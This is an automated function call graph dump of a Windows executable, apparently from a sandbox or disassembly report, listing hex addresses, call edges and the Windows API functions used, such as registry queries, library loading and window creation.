50171->50172 50173 482c17 50172->50173 50174 482c68 50173->50174 51590 47993c 37 API calls 50173->51590 51419 4241dc IsIconic 50174->51419 50178 482c98 51427 481f98 50178->51427 50179 482c83 SetActiveWindow 50179->50178 50228->49919 50229->49905 50230->49905 50231->49905 53269 43d9c8 50232->53269 50235 49493c 53274 431bd0 50235->53274 50236 4949c2 50237 4949d1 50236->50237 53307 494138 18 API calls 50236->53307 50237->49932 50246 494986 53305 4941cc 18 API calls 50246->53305 50248 49499a 53306 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50248->53306 50250 4949ba 50250->49932 50251->49927 50253 457d91 50252->50253 50254 457db1 50253->50254 50255 4078f4 33 API calls 50253->50255 50257 403400 4 API calls 50254->50257 50256 457da9 50255->50256 50258 457b60 38 API calls 50256->50258 50259 457dc6 50257->50259 50258->50254 50259->49947 50268->49932 50270 403406 50269->50270 50271 40341f 50269->50271 50270->50271 50272 402660 4 API calls 50270->50272 50271->49916 50272->50271 50302 46c330 50273->50302 50276 414ae8 50277 414af6 50276->50277 50278 4034e0 18 API calls 50277->50278 50279 414b03 50278->50279 50279->49965 50280->49974 50282 46648e 50281->50282 50569 4078f4 50282->50569 50612 42cccc 50290->50612 50293 451458 50294 451428 18 API calls 50293->50294 50295 451474 50294->50295 50296 47eab4 56 API calls 50295->50296 50296->49987 50297->49991 50299 403426 50298->50299 50300 40344b 50299->50300 50301 402660 4 API calls 50299->50301 50300->49966 50301->50299 50303 414ae8 18 API calls 50302->50303 50304 46c364 50303->50304 50363 46670c 50304->50363 50308 46c376 50309 46c385 50308->50309 50312 46c39e 50308->50312 50432 47eab4 56 API calls 50309->50432 50311 46c399 50313 403420 4 API calls 50311->50313 50315 46c3e5 50312->50315 50316 46c3cc 50312->50316 50314 46b576 50313->50314 50314->49961 50314->50276 50317 46c44a 50315->50317 50330 46c3e9 50315->50330 50433 47eab4 56 API calls 50316->50433 50435 42cb4c CharNextA 50317->50435 50320 46c459 50321 46c45d 50320->50321 50324 46c476 50320->50324 50436 47eab4 56 API calls 50321->50436 50323 46c431 50434 47eab4 56 API calls 50323->50434 50325 46c49a 50324->50325 50377 46687c 50324->50377 50437 47eab4 56 API calls 50325->50437 50330->50323 50330->50324 50333 46c4b3 50385 403778 50333->50385 50338 46c4da 50438 466908 18 API calls 50338->50438 50339 46c50b 50396 42c8cc 50339->50396 50342 46c4ed 50344 451458 18 API calls 50342->50344 50346 46c4fa 50344->50346 50439 47eab4 56 API calls 50346->50439 50368 466726 50363->50368 50365 42cbc0 20 API calls 50365->50368 50366 403450 18 API calls 50366->50368 50367 406bb0 18 API calls 50367->50368 50368->50365 50368->50366 50368->50367 50369 46676f 50368->50369 50442 42caac 50368->50442 50370 403420 4 API calls 50369->50370 50371 466789 50370->50371 50372 414b18 50371->50372 50373 414ae8 18 API calls 50372->50373 50374 414b3c 50373->50374 50375 403400 4 API calls 50374->50375 50376 414b6d 50375->50376 50376->50308 50378 466886 50377->50378 50379 466899 50378->50379 50517 42cb3c CharNextA 50378->50517 50379->50325 50381 4668ac 50379->50381 50383 4668b6 50381->50383 50382 4668e3 50382->50325 50382->50333 50383->50382 50518 42cb3c CharNextA 50383->50518 50386 4037aa 50385->50386 50388 40377d 50385->50388 50387 403400 4 API calls 50386->50387 50391 4037a0 50387->50391 50388->50386 50389 403791 50388->50389 50519 4034e0 50389->50519 50392 42c99c 50391->50392 50393 42c9f5 50392->50393 50394 42c9b2 50392->50394 50393->50338 50393->50339 50394->50393 50524 42cb3c CharNextA 50394->50524 50525 42c674 50396->50525 50399 42c8e0 50400 42c8e9 50432->50311 50433->50311 50434->50311 50435->50320 50436->50311 50437->50311 50438->50342 50439->50311 50451 403494 50442->50451 50444 42cabc 50449 42caf2 50444->50449 50455 403744 50444->50455 50459 42c444 IsDBCSLeadByte 50444->50459 50447 42cb36 50447->50368 50449->50447 50460 4037b8 50449->50460 50465 42c444 IsDBCSLeadByte 50449->50465 50452 403498 50451->50452 50453 4034ba 50452->50453 50466 402660 50452->50466 50453->50444 50456 40374a 50455->50456 50458 40375b 50455->50458 50456->50458 50471 4034bc 50456->50471 50458->50444 50459->50444 50461 403744 18 API calls 50460->50461 50463 4037c6 50461->50463 50462 4037fc 50462->50449 50463->50462 50507 4038a4 50463->50507 50465->50449 50467 402664 50466->50467 50468 40266e 50466->50468 50467->50468 50470 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50467->50470 50468->50453 50470->50468 50472 4034c0 50471->50472 50473 4034dc 50471->50473 50476 402648 50472->50476 50473->50458 50475 4034c9 50475->50458 50477 40264c 50476->50477 50479 402656 50476->50479 50482 402088 50477->50482 50478 402652 50478->50479 50493 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50478->50493 50479->50475 50479->50479 50483 40209c 50482->50483 50484 4020a1 50482->50484 50494 4019cc RtlInitializeCriticalSection 50483->50494 50485 4020c6 RtlEnterCriticalSection 50484->50485 50487 4020d0 50484->50487 50490 4020a5 50484->50490 50485->50487 50487->50490 50501 401f94 50487->50501 50490->50478 50491 4021f1 RtlLeaveCriticalSection 50492 4021fb 50491->50492 50492->50478 50493->50479 50495 4019f0 RtlEnterCriticalSection 50494->50495 50496 4019fa 50494->50496 50495->50496 50497 401a18 LocalAlloc 50496->50497 50498 401a32 50497->50498 50499 401a81 50498->50499 50500 401a77 RtlLeaveCriticalSection 50498->50500 50499->50484 50500->50499 50502 401fa4 50501->50502 50503 401ff4 50502->50503 50504 401fd0 50502->50504 50506 401f0c 12 API calls 50502->50506 50503->50491 50503->50492 50504->50503 50505 401db4 9 API calls 50504->50505 50505->50503 50506->50502 50508 4038b1 50507->50508 50515 4038e1 50507->50515 50510 4038da 50508->50510 50512 4038bd 50508->50512 50509 403400 4 API calls 50511 4038cb 50509->50511 50513 4034bc 18 API calls 50510->50513 50511->50462 50516 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50512->50516 50513->50515 50515->50509 50516->50511 50517->50378 50518->50383 50520 4034bc 18 API calls 50519->50520 50521 4034f0 50520->50521 50522 403400 4 API calls 50521->50522 50523 403508 50522->50523 50523->50391 50524->50394 50528 42c67c 50525->50528 50527 42c67b 50527->50399 50527->50400 50531 42c68d 50528->50531 50529 42c6f1 50532 42c6ec 50529->50532 50536 42c444 IsDBCSLeadByte 50529->50536 50531->50529 50534 42c6ab 50531->50534 50532->50527 50534->50532 50535 42c444 IsDBCSLeadByte 50534->50535 50535->50534 50536->50532 50572 407908 50569->50572 50573 407925 50572->50573 50580 4075b8 50573->50580 50576 407951 50578 4034e0 18 API calls 50576->50578 50579 407903 50578->50579 50579->49981 50582 4075d3 50580->50582 50581 4075e5 50581->50576 50585 4069a0 19 API calls 50581->50585 50582->50581 50586 4076da 33 API calls 50582->50586 50587 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50582->50587 50585->50576 50586->50582 50587->50582 50613 42cbc0 20 API calls 50612->50613 50614 42ccee 50613->50614 50615 42ccf6 GetFileAttributesA 50614->50615 50616 403400 4 API calls 50615->50616 50617 42cd13 50616->50617 50617->49987 50617->50293 50618->50001 50621 46a5fb 50619->50621 50620 46aa73 50622 46aa8e 50620->50622 50623 46aabf 50620->50623 50621->50620 50624 46a6b6 50621->50624 50627 403494 4 API calls 50621->50627 50626 403494 4 API calls 50622->50626 50628 403494 4 API calls 50623->50628 50625 46a6d7 50624->50625 50629 46a718 50624->50629 50630 403494 4 API calls 50625->50630 50631 46aa9c 50626->50631 50632 46a63a 50627->50632 50633 46aacd 50628->50633 50637 403400 4 API calls 50629->50637 50634 46a6e5 50630->50634 50731 468fd0 26 API calls 50631->50731 50636 414ae8 18 API calls 50632->50636 50732 468fd0 26 API calls 50633->50732 50639 414ae8 18 API calls 50634->50639 50641 46a65b 50636->50641 50642 46a716 50637->50642 50644 46a706 50639->50644 50640 46aaaa 50643 403400 4 API calls 50640->50643 50705 403634 50641->50705 50662 46a7fc 50642->50662 50711 4696dc 50642->50711 50647 46aaf0 50643->50647 50649 403634 18 API calls 50644->50649 50653 403400 4 API calls 50647->50653 50648 46a884 50651 403400 4 API calls 50648->50651 50649->50642 50655 46a882 50651->50655 50652 46a738 50656 46a776 50652->50656 50657 46a73e 50652->50657 50658 46aaf8 50653->50658 50726 469b18 57 API calls 50655->50726 50663 403400 4 API calls 50656->50663 50660 403494 4 API calls 50657->50660 50661 403420 4 API calls 50658->50661 50664 46a74c 50660->50664 50665 46ab05 50661->50665 50662->50648 50666 46a843 50662->50666 50667 46a774 50663->50667 50717 47bd90 50664->50717 50665->50007 50672 403494 4 API calls 50666->50672 50720 4699d0 50667->50720 50676 46a851 50672->50676 50674 46a8ad 50682 46a90e 50674->50682 50683 46a8b8 50674->50683 50675 46a764 50677 403634 18 API calls 50675->50677 50678 414ae8 18 API calls 50676->50678 50677->50667 50680 46a872 50678->50680 50684 403634 18 API calls 50680->50684 50681 46a79d 50687 46a7fe 50681->50687 50688 46a7a8 50681->50688 50685 403400 4 API calls 50682->50685 50686 403494 4 API calls 50683->50686 50684->50655 50689 46a916 50685->50689 50694 46a8c6 50686->50694 50691 403400 4 API calls 50687->50691 50690 403494 4 API calls 50688->50690 50692 46a90c 50689->50692 50703 46a9bf 50689->50703 50696 46a7b6 50690->50696 50691->50662 50692->50689 50727 494800 18 API calls 50692->50727 50694->50689 50694->50692 50697 403634 18 API calls 50694->50697 50695 46a939 50695->50703 50728 494aac 32 API calls 50695->50728 50696->50662 50699 403634 18 API calls 50696->50699 50697->50694 50699->50696 50701 46aa60 50730 429144 SendMessageA SendMessageA 50701->50730 50729 4290f4 SendMessageA 50703->50729 50704->50009 50706 40363c 50705->50706 50707 4034bc 18 API calls 50706->50707 50708 40364f 50707->50708 50709 403450 18 API calls 50708->50709 50710 403677 50709->50710 50733 42a040 SendMessageA 50711->50733 50713 4696eb 50714 46970b 50713->50714 50734 42a040 SendMessageA 50713->50734 50714->50652 50716 4696fb 50716->50652 50735 47bdb0 50717->50735 50724 4699fd 50720->50724 50721 469a5f 50722 403400 4 API calls 50721->50722 50723 469a74 50722->50723 50723->50681 50724->50721 51080 469954 57 API calls 50724->51080 50726->50674 50727->50695 50728->50703 50729->50701 50730->50620 50731->50640 50732->50640 50733->50713 50734->50716 50736 403494 4 API calls 50735->50736 50737 47bde3 50736->50737 50738 47bee8 50737->50738 50742 403778 18 API calls 50737->50742 50746 4037b8 18 API calls 50737->50746 50747 47ac24 50737->50747 50991 453344 18 API calls 50737->50991 50992 403800 50737->50992 50996 42c97c CharPrevA 50737->50996 50739 403420 4 API calls 50738->50739 50740 47bdab 50739->50740 50740->50675 50742->50737 50746->50737 50748 47ac76 50747->50748 50751 47ac54 50747->50751 50749 47ac96 50748->50749 50750 47ac84 50748->50750 50754 47aca4 50749->50754 50755 47acf9 50749->50755 50752 403494 4 API calls 50750->50752 50751->50748 51001 479b54 33 API calls 50751->51001 50844 47ac91 50752->50844 50757 47acd3 50754->50757 50758 47acad 50754->50758 50765 47ad07 50755->50765 50766 47ad1a 50755->50766 50756 403400 4 API calls 50760 47b61c 50756->50760 50759 47ace6 50757->50759 51003 453344 18 API calls 50757->51003 50761 47acc0 50758->50761 51002 453344 18 API calls 50758->51002 50763 403494 4 API calls 50759->50763 50764 403400 4 API calls 50760->50764 50768 403494 4 API calls 50761->50768 50763->50844 50769 47b624 50764->50769 50770 403494 4 API calls 50765->50770 50771 47ad3b 50766->50771 50772 47ad28 50766->50772 50768->50844 50769->50737 50770->50844 50774 47ad8b 50771->50774 50775 47ad49 50771->50775 50773 403494 4 API calls 50772->50773 50773->50844 50780 47adac 50774->50780 50781 47ad99 50774->50781 50776 47ad65 50775->50776 50777 47ad52 50775->50777 50779 47ad78 50776->50779 51004 453344 18 API calls 50776->51004 50778 403494 4 API calls 50777->50778 50778->50844 50783 403494 4 API calls 50779->50783 50785 47adcd 50780->50785 50786 47adba 50780->50786 50784 403494 4 API calls 50781->50784 50783->50844 50784->50844 50788 47adee 50785->50788 50789 47addb 50785->50789 50787 403494 4 API calls 50786->50787 50787->50844 50791 47ae0f 50788->50791 50792 47adfc 50788->50792 50790 403494 4 API calls 50789->50790 50790->50844 50794 47ae1d 50791->50794 50795 47ae4b 50791->50795 50793 403494 4 API calls 50792->50793 50793->50844 50796 47ae26 50794->50796 50797 47ae39 50794->50797 50800 47ae59 50795->50800 50801 47ae88 50795->50801 50798 403494 4 API calls 50796->50798 50799 47bd90 57 API calls 50797->50799 50798->50844 50799->50844 50802 47ae75 50800->50802 50803 47ae62 50800->50803 50806 47ae96 50801->50806 50807 47aec4 50801->50807 50805 403494 4 API calls 50802->50805 50804 403494 4 API calls 50803->50804 50804->50844 50805->50844 50808 47aeb2 50806->50808 50809 47ae9f 50806->50809 50812 47aed2 50807->50812 50813 47af01 50807->50813 50811 47bd90 57 API calls 50808->50811 50810 403494 4 API calls 50809->50810 50810->50844 50811->50844 50814 47aeee 50812->50814 50815 47aedb 50812->50815 50818 47af22 50813->50818 50819 47af0f 50813->50819 50817 403494 4 API calls 50814->50817 50816 403494 4 API calls 50815->50816 50816->50844 50817->50844 50821 47af43 50818->50821 50822 47af30 50818->50822 50820 403494 4 API calls 50819->50820 50820->50844 50844->50756 50991->50737 50993 403804 50992->50993 50995 40382f 50992->50995 50994 4038a4 18 API calls 50993->50994 50994->50995 50995->50737 50996->50737 51001->50751 51002->50761 51003->50759 51004->50779 51080->50724 51082 47d809 51081->51082 51085 47d846 51081->51085 51113 455d0c 51082->51113 51085->50015 51087 47d85d 51087->50015 51232 466588 51088->51232 51091->50025 51093 42f56c 51092->51093 51094 42f58f GetActiveWindow GetFocus 51093->51094 51095 41eea4 2 API calls 51094->51095 51096 42f5a6 51095->51096 51097 42f5c3 51096->51097 51098 42f5b3 RegisterClassA 51096->51098 51099 42f652 SetFocus 51097->51099 51100 42f5d1 CreateWindowExA 51097->51100 51098->51097 51101 403400 4 API calls 51099->51101 51100->51099 51102 42f604 51100->51102 51103 42f66e 51101->51103 51263 42427c 51102->51263 51108 494aac 32 API calls 51103->51108 51105 42f62c 51106 42f634 CreateWindowExA 51105->51106 51106->51099 51107 42f64a ShowWindow 51106->51107 51107->51099 51108->50062 51269 44b514 51109->51269 51114 455d1d 51113->51114 51115 455d21 51114->51115 51116 455d2a 51114->51116 51139 455a10 51115->51139 51147 455af0 43 API calls 51116->51147 51119 455d27 51119->51085 51120 47d460 51119->51120 51126 47d55c 51120->51126 51129 47d4a0 51120->51129 51121 47d4ff 51122 403420 4 API calls 51121->51122 51123 47d63f 51122->51123 51123->51087 51126->51121 51131 47d5ad 51126->51131 51202 479150 51126->51202 51128 47bd90 57 API calls 51128->51131 51129->51121 51129->51126 51130 47bd90 57 API calls 51129->51130 51137 47d508 51129->51137 51176 479290 51129->51176 51187 4793f4 51129->51187 51130->51129 51131->51126 51131->51128 51133 454100 34 API calls 51131->51133 51135 47d549 51131->51135 51132 47bd90 57 API calls 51132->51137 51133->51131 51135->51121 51137->51129 51137->51132 51137->51135 51191 42c92c 51137->51191 51196 42c954 51137->51196 51201 47d16c 66 API calls 51137->51201 51148 42de1c 51139->51148 51141 455a2d 51142 455a7b 51141->51142 51151 455944 51141->51151 51142->51119 51145 455944 20 API calls 51146 455a5c RegCloseKey 51145->51146 51146->51119 51147->51119 51149 42de27 51148->51149 51150 42de2d RegOpenKeyExA 51148->51150 51149->51150 51150->51141 51156 42dd58 51151->51156 51153 403420 4 API calls 51154 4559f6 51153->51154 51154->51145 51155 45596c 51155->51153 51159 42dc00 51156->51159 51160 42dc26 RegQueryValueExA 51159->51160 51165 42dc49 51160->51165 51175 42dc6b 51160->51175 51161 403400 4 API calls 51163 42dd37 51161->51163 51162 42dc63 51164 403400 4 API calls 51162->51164 51163->51155 51164->51175 51165->51162 51166 4034e0 18 API calls 51165->51166 51167 403744 18 API calls 51165->51167 51165->51175 51166->51165 51168 42dca0 RegQueryValueExA 51167->51168 51168->51160 51170 42dcbc 51168->51170 51169 4038a4 18 API calls 51171 42dcfe 51169->51171 51170->51169 51170->51175 51172 42dd10 51171->51172 51174 403744 18 API calls 51171->51174 51173 403450 18 API calls 51172->51173 51173->51175 51174->51172 51175->51161 51177 4792a6 51176->51177 51178 4792a2 51176->51178 51179 403450 18 API calls 51177->51179 51178->51129 51180 4792b3 51179->51180 51181 4792d3 51180->51181 51182 4792b9 51180->51182 51183 479150 33 API calls 51181->51183 51184 479150 33 API calls 51182->51184 51185 4792cf 51183->51185 51184->51185 51186 403400 4 API calls 51185->51186 51186->51178 51188 479400 51187->51188 51189 47941b 51188->51189 51214 453344 18 API calls 51188->51214 51189->51129 51215 42c79c 51191->51215 51194 403778 18 API calls 51195 42c94e 51194->51195 51195->51137 51197 42c79c IsDBCSLeadByte 51196->51197 51198 42c964 51197->51198 51199 403778 18 API calls 51198->51199 51200 42c975 51199->51200 51200->51137 51201->51137 51203 47916b 51202->51203 51204 47922a 51203->51204 51207 47919c 51203->51207 51227 479004 33 API calls 51203->51227 51204->51126 51206 4791c1 51210 4791e2 51206->51210 51229 479004 33 API calls 51206->51229 51207->51206 51228 479004 33 API calls 51207->51228 51210->51204 51211 479222 51210->51211 51230 453344 18 API calls 51210->51230 51221 478e88 51211->51221 51214->51189 51216 42c67c IsDBCSLeadByte 51215->51216 51217 42c7b1 51216->51217 51218 42c7fb 51217->51218 51220 42c444 IsDBCSLeadByte 51217->51220 51218->51194 51220->51217 51222 478ec3 51221->51222 51223 403450 18 API calls 51222->51223 51224 478ee8 51223->51224 51231 477578 33 API calls 51224->51231 51226 478f29 51226->51204 51227->51207 51228->51206 51229->51210 51230->51211 51231->51226 51233 403494 4 API calls 51232->51233 51234 4665b6 51233->51234 51249 42dbc8 51234->51249 51237 42dbc8 19 API calls 51238 4665da 51237->51238 51239 466474 33 API calls 51238->51239 51240 4665e4 51239->51240 51241 42dbc8 19 API calls 51240->51241 51242 4665f3 51241->51242 51252 4664ec 51242->51252 51245 42dbc8 19 API calls 51246 46660c 51245->51246 51247 403400 4 API calls 51246->51247 51248 466621 51247->51248 51248->50019 51256 42db10 51249->51256 51253 46650c 51252->51253 51254 4078f4 33 API calls 51253->51254 51255 466556 51254->51255 51255->51245 51257 42db30 51256->51257 51258 42dbbb 51256->51258 51257->51258 51259 4037b8 18 API calls 51257->51259 51261 403800 18 API calls 51257->51261 51262 42c444 IsDBCSLeadByte 51257->51262 51258->51237 51259->51257 51261->51257 51262->51257 51264 4242ae 51263->51264 51265 42428e GetWindowTextA 51263->51265 51267 403494 4 API calls 51264->51267 51266 4034e0 18 API calls 51265->51266 51268 4242ac 51266->51268 51267->51268 51268->51105 51272 44b38c 51269->51272 51273 44b3bf 51272->51273 51274 414ae8 18 API calls 51273->51274 51275 44b3d2 51274->51275 51276 44b3ff GetDC 51275->51276 51277 40357c 18 API calls 51275->51277 51283 41a1e8 51276->51283 51277->51276 51280 44b430 51291 44b0c0 51280->51291 51284 41a2af 51283->51284 51285 41a213 51283->51285 51286 403400 4 API calls 51284->51286 51302 403520 51285->51302 51287 41a2c7 SelectObject 51286->51287 51287->51280 51289 41a26b 51290 41a2a3 CreateFontIndirectA 51289->51290 51290->51284 51292 44b0d7 51291->51292 51293 44b16a 51292->51293 51294 44b0ea 51292->51294 51295 44b153 51292->51295 51294->51293 51303 4034e0 18 API calls 51302->51303 51304 40352a 51303->51304 51304->51289 51307 46514b 51305->51307 51306 465226 51316 466f00 51306->51316 51307->51306 51311 46519b 51307->51311 51328 421a1c 51307->51328 51308 4651de 51308->51306 51334 4185b8 21 API calls 51308->51334 51311->51308 51312 4651d5 51311->51312 51313 4651e0 51311->51313 51314 421a1c 21 API calls 51312->51314 51315 421a1c 21 API calls 51313->51315 51314->51308 51315->51308 51317 466f30 51316->51317 51318 466f11 51316->51318 51317->50086 51319 414b18 18 API calls 51318->51319 51320 466f1f 51319->51320 51321 414b18 18 API calls 51320->51321 51321->51317 51331 421a74 51328->51331 51333 421a2a 51328->51333 51331->51311 51332 421a59 51332->51331 51343 421d28 SetFocus GetFocus 51332->51343 51333->51332 51335 408cbc 51333->51335 51334->51306 51336 408cc8 51335->51336 51344 406dec LoadStringA 51336->51344 51339 403450 18 API calls 51340 408cf9 51339->51340 51341 403400 4 API calls 51340->51341 51342 408d0e 51341->51342 51342->51332 51343->51331 51345 4034e0 18 API calls 51344->51345 51346 406e19 51345->51346 51346->51339 51391 46c619 51390->51391 51392 46c666 51391->51392 51393 414ae8 18 API calls 51391->51393 51395 403420 4 API calls 51392->51395 51394 46c62f 51393->51394 51597 466798 20 API calls 51394->51597 51397 46c710 51395->51397 51397->50166 51589 408be0 19 API calls 51397->51589 51398 46c637 51399 414b18 18 API calls 51398->51399 51400 46c645 51399->51400 51401 46c652 51400->51401 51403 46c66b 51400->51403 51598 47eab4 56 API calls 51401->51598 51404 46c683 51403->51404 51405 46687c CharNextA 51403->51405 51599 47eab4 56 API calls 51404->51599 51407 46c67f 51405->51407 51407->51404 51408 46c699 51407->51408 51409 46c6b5 51408->51409 51410 46c69f 51408->51410 51411 42c99c CharNextA 51409->51411 51600 47eab4 56 API calls 51410->51600 51413 46c6c2 51411->51413 51413->51392 51601 466908 18 API calls 51413->51601 51415 46c6d9 51416 451458 18 API calls 51415->51416 51417 46c6e6 51416->51417 51602 47eab4 56 API calls 51417->51602 51420 4241ed SetActiveWindow 51419->51420 51425 424223 51419->51425 51603 42364c 51420->51603 51424 42420a 51424->51425 51426 42421d SetFocus 51424->51426 51425->50178 51425->50179 51426->51425 51428 481fe9 51427->51428 51429 481fbb 51427->51429 51431 4759c0 51428->51431 51616 49485c 32 API calls 51429->51616 51617 457b60 51431->51617 51435 475a16 51641 46e17c 51435->51641 51590->50174 51597->51398 51598->51392 51599->51392 51600->51392 51601->51415 51602->51392 51612 4235f8 SystemParametersInfoA 51603->51612 51605 423665 ShowWindow 51608 423670 51605->51608 51609 423677 51605->51609 51615 423628 SystemParametersInfoA 51608->51615 51611 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 51609->51611 51611->51424 51613 423616 51612->51613 51613->51605 51614 423628 SystemParametersInfoA 51613->51614 51614->51605 51615->51609 51616->51428 51618 457c94 51617->51618 51619 457b8c 51617->51619 51620 457ce5 51618->51620 52093 4573c8 20 API calls 51618->52093 52089 45785c GetSystemTimeAsFileTime FileTimeToSystemTime 51619->52089 51623 403400 4 API calls 51620->51623 51625 457cfa 51623->51625 51624 457b94 51626 4078f4 33 API calls 51624->51626 51638 4072a8 51625->51638 51627 457c05 51626->51627 52090 457b50 34 API calls 51627->52090 51629 403778 18 API calls 51633 457c0d 51629->51633 51630 457c5b 51631 457c8a 51630->51631 51635 403778 18 API calls 51630->51635 51633->51629 51633->51630 51634 457b50 34 API calls 51633->51634 51634->51633 52094 403738 51638->52094 52089->51624 52090->51633 52093->51620 52095 40373c SetCurrentDirectoryA 52094->52095 52095->51435 53308 431eec 53269->53308 53271 403400 4 API calls 53272 43da76 53271->53272 53272->50235 53272->50236 53273 43d9f2 53273->53271 53275 431bd6 53274->53275 53276 402648 18 API calls 53275->53276 53277 431c06 53276->53277 53278 494368 53277->53278 53279 49443d 53278->53279 53280 494382 53278->53280 53285 494480 53279->53285 53280->53279 53281 433d6c 18 API calls 53280->53281 53284 403450 18 API calls 53280->53284 53313 408c0c 18 API calls 53280->53313 53314 431ca0 53280->53314 53281->53280 53284->53280 53286 49449c 53285->53286 53322 433d6c 53286->53322 53288 4944a1 53289 431ca0 18 API calls 53288->53289 53290 4944ac 53289->53290 53291 43d594 53290->53291 53292 43d5c1 53291->53292 53297 43d5b3 53291->53297 53292->50246 53293 43d63d 53301 43d6f7 53293->53301 53325 447084 53293->53325 53295 43d688 53331 43dd50 53295->53331 53297->53292 53297->53293 53298 447084 18 API calls 53297->53298 53298->53297 53299 43d8fd 53299->53292 53351 447024 18 API calls 53299->53351 53301->53299 53302 43d8de 53301->53302 53349 447024 18 API calls 53301->53349 53350 447024 18 API calls 53302->53350 53305->50248 53306->50250 53307->50237 53309 403494 4 API calls 53308->53309 53311 431efb 53309->53311 53310 431f25 53310->53273 53311->53310 53312 403744 18 API calls 53311->53312 53312->53311 53313->53280 53315 431cc0 53314->53315 53316 431cae 53314->53316 53318 431ce2 53315->53318 53321 431c40 18 API calls 53315->53321 53320 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53316->53320 53318->53280 53320->53315 53321->53318 53323 402648 18 API calls 53322->53323 53324 433d7b 53323->53324 53324->53288 53326 4470a3 53325->53326 53327 4470aa 53325->53327 53352 446e30 18 API calls 53326->53352 53329 431ca0 18 API calls 53327->53329 53330 4470ba 53329->53330 53330->53295 53332 43dd6c 53331->53332 53337 43dd99 53331->53337 53333 402660 4 API calls 53332->53333 53332->53337 53333->53332 53334 43ddce 53334->53301 53336 43fea5 53336->53334 53362 447024 18 API calls 53336->53362 53337->53334 53337->53336 53338 447024 18 API calls 53337->53338 53340 43c938 18 API calls 53337->53340 53341 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53337->53341 53345 433d18 18 API calls 53337->53345 53346 436650 18 API calls 53337->53346 53347 431c40 18 API calls 53337->53347 53348 446e30 18 API calls 53337->53348 53353 4396e0 53337->53353 53359 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53337->53359 53360 43dc48 32 API calls 53337->53360 53361 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53337->53361 53338->53337 53340->53337 53341->53337 53345->53337 53346->53337 53347->53337 53348->53337 53349->53301 53350->53299 53351->53299 53352->53327 53354 4396e9 53353->53354 53355 403400 4 API calls 53354->53355 53356 43c8e8 53355->53356 53359->53337 53360->53337 53361->53337 53362->53336 57628 42f520 57629 42f52b 57628->57629 57630 42f52f NtdllDefWindowProc_A 57628->57630 57630->57629 53365 416b42 53366 416bea 53365->53366 53367 416b5a 53365->53367 53384 41531c 18 API calls 53366->53384 53369 416b74 SendMessageA 53367->53369 53370 416b68 53367->53370 53380 416bc8 53369->53380 53371 416b72 CallWindowProcA 53370->53371 53372 416b8e 53370->53372 53371->53380 53381 41a058 GetSysColor 53372->53381 53375 416b99 SetTextColor 53376 416bae 53375->53376 53382 41a058 GetSysColor 53376->53382 53378 416bb3 SetBkColor 53383 41a6e0 GetSysColor CreateBrushIndirect 53378->53383 53381->53375 53382->53378 53383->53380 53384->53380 57631 4358e0 57632 4358f5 57631->57632 57636 43590f 57632->57636 57637 4352c8 57632->57637 57641 4352f8 57637->57641 57647 435312 57637->57647 57638 403400 4 API calls 57639 435717 57638->57639 57639->57636 57650 435728 18 API calls 57639->57650 57640 446da4 18 API calls 57640->57641 57641->57640 57642 403450 18 API calls 57641->57642 57643 402648 18 API calls 57641->57643 57645 431ca0 18 API calls 57641->57645 57646 4038a4 18 API calls 57641->57646 57641->57647 57648 403744 18 API calls 57641->57648 57651 4343b0 57641->57651 57663 434b74 18 API calls 57641->57663 57642->57641 57643->57641 57645->57641 57646->57641 57647->57638 57648->57641 57650->57636 57652 43446d 57651->57652 57653 4343dd 57651->57653 57682 434310 18 API calls 57652->57682 57655 403494 4 API calls 57653->57655 57657 4343eb 57655->57657 57656 43445f 57658 403400 4 API calls 57656->57658 57659 403778 18 API calls 57657->57659 57660 4344bd 57658->57660 57661 43440c 57659->57661 57660->57641 57661->57656 57664 4944b4 57661->57664 57663->57641 57665 4944ec 57664->57665 57666 494584 57664->57666 57667 403494 4 API calls 57665->57667 57683 448930 57666->57683 57671 4944f7 57667->57671 57669 403400 4 API calls 57670 4945a8 57669->57670 57672 403400 4 API calls 57670->57672 57673 4037b8 18 API calls 57671->57673 57676 494507 57671->57676 57674 4945b0 57672->57674 57675 494520 57673->57675 57674->57661 57675->57676 57677 4037b8 18 API calls 57675->57677 57676->57669 57678 494543 57677->57678 57679 403778 18 API calls 57678->57679 57680 494574 57679->57680 57681 403634 18 API calls 57680->57681 57681->57666 57682->57656 57684 448955 57683->57684 57694 448998 57683->57694 57685 403494 4 API calls 57684->57685 57687 448960 57685->57687 57686 4489ac 57689 403400 4 API calls 57686->57689 57691 4037b8 18 API calls 57687->57691 57690 4489df 57689->57690 57690->57676 57692 44897c 57691->57692 57693 4037b8 18 API calls 57692->57693 57693->57694 57694->57686 57695 44852c 57694->57695 57696 403494 4 API calls 57695->57696 57697 448562 57696->57697 57698 4037b8 18 API calls 57697->57698 57699 448574 57698->57699 57700 403778 18 API calls 57699->57700 57701 448595 57700->57701 57702 4037b8 18 API calls 57701->57702 57703 4485ad 57702->57703 57704 403778 18 API calls 57703->57704 57705 4485d8 57704->57705 57706 4037b8 18 API calls 57705->57706 57717 4485f0 57706->57717 57707 448628 57709 403420 4 API calls 57707->57709 57708 4486c3 57712 4486cb GetProcAddress 57708->57712 57713 448708 57709->57713 57710 44864b LoadLibraryExA 57710->57717 57711 44865d LoadLibraryA 57711->57717 57714 4486de 57712->57714 57713->57686 57714->57707 57715 403b80 18 API calls 57715->57717 57716 403450 18 API calls 57716->57717 57717->57707 57717->57708 57717->57710 57717->57711 57717->57715 57717->57716 57719 43da88 18 API calls 57717->57719 57719->57717 53385 416644 53386 416651 53385->53386 53387 4166ab 53385->53387 53392 416550 CreateWindowExA 53386->53392 53388 416658 SetPropA SetPropA 53388->53387 53389 41668b 53388->53389 53390 41669e SetWindowPos 53389->53390 53390->53387 53392->53388 57720 4222e4 57721 4222f3 57720->57721 57726 421274 57721->57726 57724 422313 57727 4212e3 57726->57727 57741 421283 57726->57741 57730 4212f4 57727->57730 57751 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 57727->57751 57729 421322 57733 421395 57729->57733 57738 42133d 57729->57738 57730->57729 57732 4213ba 57730->57732 57731 421393 